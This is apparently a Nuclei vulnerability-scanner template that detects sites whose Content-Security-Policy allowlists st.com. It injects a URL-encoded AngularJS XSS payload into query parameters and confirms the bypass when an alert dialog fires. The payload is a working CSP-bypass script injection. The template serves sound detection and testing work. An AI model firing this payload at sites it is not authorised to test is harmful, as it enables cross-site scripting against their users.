id: st-angular-csp-bypass
info:
name: Content-Security-Policy Bypass - ST Angular
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,st-angular,vuln
flow: http(1) && headless(1)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Content-Security-Policy"
- "st.com"
condition: and
internal: true
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitdialog
name: st_angular_csp_xss
args:
max-duration: 5s
payloads:
injection:
- <body ng-app ng-csp><script src="https://www.st.com/etc/clientlibs/st-search-cx/stangularjs.min.d9f5c8180af41b5cae710870b6b018fe.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"
matchers:
- type: dsl
dsl:
- "st_angular_csp_xss == true"
# digest: 4a0a004730450221008849d9057feb93c9a251af87abdf80e4de2e9836e51ba09fc7a3ff75c548e5b3022042dc820abe8a0106b886de05c3248abfdb5dde67d3d502b23c0ba500aca53906:922c64590222798bb761d5b6d8e72950